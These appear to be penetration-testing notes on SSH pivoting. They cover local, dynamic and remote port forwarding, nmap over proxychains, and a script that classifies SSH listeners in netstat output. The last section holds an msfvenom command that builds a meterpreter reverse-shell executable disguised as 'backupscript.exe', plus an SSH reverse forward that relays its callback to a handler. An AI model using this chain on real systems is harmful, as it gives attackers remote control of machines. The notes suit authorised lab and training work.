# SSH

## Local port forwarding

```bash
ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
```

The `-L` option tells the SSH client to ask the SSH server to forward all the data we send to local port `1234` on to `localhost:3306` on the Ubuntu server.

### Confirming Port Forward with Netstat

```bash
netstat -antp | grep 1234
```
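
Going beyond the single `grep` above, this added example (not part of the original notes) classifies every SSH-owned listener in `netstat -antp` output, covering the `-L`, `-D` and `-R` forwards on this page, and reports whether each one is bound to loopback or exposed to the network. The sample lines, including `172.16.5.129`, `10.10.14.18` and the PIDs, are constructed, and the function name is hypothetical.

```bash
#!/usr/bin/env bash
# Added example: classify SSH-owned listening sockets from `netstat -antp` output.
# Reads netstat text on stdin; $1 is the port sshd normally listens on (default 22).
find_ssh_forwards() {
  awk -v sshd_port="${1:-22}" '
    $6 == "LISTEN" {
      # Column 7 is "PID/Program"; sshd session processes show as "PID/sshd:".
      split($7, proc, "/")
      pid = proc[1]; prog = proc[2]; sub(/:$/, "", prog)
      # Local address is "addr:port"; IPv6 addresses contain colons themselves.
      n = split($4, part, ":")
      port = part[n]
      addr = substr($4, 1, length($4) - length(port) - 1)
      scope = (addr == "127.0.0.1" || addr == "::1") ? "loopback" : "exposed"
      if (prog == "ssh") {
        kind = "client-forward"   # ssh -L or ssh -D listener on this host
      } else if (prog == "sshd" && port != sshd_port) {
        kind = "remote-forward"   # ssh -R listener opened by sshd on this host
      } else {
        next
      }
      printf "%s %s:%s pid=%s %s\n", kind, addr, port, pid, scope
    }'
}

# Constructed sample output (not captured from a real host).
sample_netstat() {
  cat <<'EOF'
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:1234          0.0.0.0:*               LISTEN      4034/ssh
tcp        0      0 127.0.0.1:1080          0.0.0.0:*               LISTEN      4120/ssh
tcp        0      0 172.16.5.129:8080       0.0.0.0:*               LISTEN      5333/sshd: ubuntu
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      901/mysqld
tcp        0      0 10.129.202.64:22        10.10.14.18:51234       ESTABLISHED 5301/sshd: ubuntu
EOF
}

sample_netstat | find_ssh_forwards 22
```

On a live host, pipe `netstat -antp` (run as root so the PID/Program column is populated for all users) into `find_ssh_forwards`. An `exposed` remote forward means the server allows non-loopback binds for `-R`, which `GatewayPorts` in `sshd_config` controls.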

## Dynamic port forwarding

```bash
ssh -D 1080 ubuntu@10.129.202.64
```

The `-D` argument requests the SSH server to enable dynamic port forwarding. Once this is enabled, we need a tool that can route any other tool's packets over port `9050`.

{% hint style="info" %}
To tell proxychains to use port 1080, we must modify the proxychains configuration file located at `/etc/proxychains.conf`. We can add `socks5 127.0.0.1 1080` as the last line if it is not already there.
{% endhint %}

### Nmap

{% hint style="info" %}
One more important note to remember here is that we can only perform a `full TCP connect scan` over proxychains.
{% endhint %}

```bash
proxychains nmap -v -Pn -sT 172.16.5.19
```

## Setting up remote/reverse port forwarding through SSH

### Payload - listener sent to InternalIPofPivotHost:8080

```shell-session
msfvenom -p windows/x64/meterpreter/reverse_https lhost=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
```

### SSH remote port forward - InternalIPofPivotHost:8080 --> 8000

```bash
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
```

### Local listener on port 0.0.0.0:8000

Use multi/handler LPORT 8000
